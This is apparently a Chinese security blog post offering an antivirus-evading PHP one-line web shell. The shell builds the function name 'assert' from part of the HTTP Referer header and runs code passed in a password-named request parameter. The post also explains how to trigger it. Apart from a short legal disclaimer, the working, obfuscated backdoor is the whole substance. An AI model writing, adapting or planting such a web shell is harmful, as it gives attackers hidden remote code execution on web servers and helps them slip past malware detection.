查看原文
其他

一个免杀的PHP一句话木马

LemonSec 2023-06-11

####################
免责声明:工具本身并无好坏,希望大家以遵守《网络安全法》相关法律为前提来使用该工具,支持研究学习,切勿用于非法犯罪活动,对于恶意使用该工具造成的损失,和本人及开发者无关。
####################


<?php/** * Noticed: (PHP 5 >= 5.3.0, PHP 7) * */$password = "uedbox.com";$wx = substr($_SERVER["HTTP_REFERER"],-7,-4);forward_static_call_array($wx."ert", array($_REQUEST[$password]));?>


请求时,设置Referer头,后面以"ass****"结尾即可,比如:Referer: https://www.baidu.com/ass.php

侵权请私聊公众号删文


 热文推荐  


欢迎关注LemonSec
觉得不错点个“赞”、“在看“

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存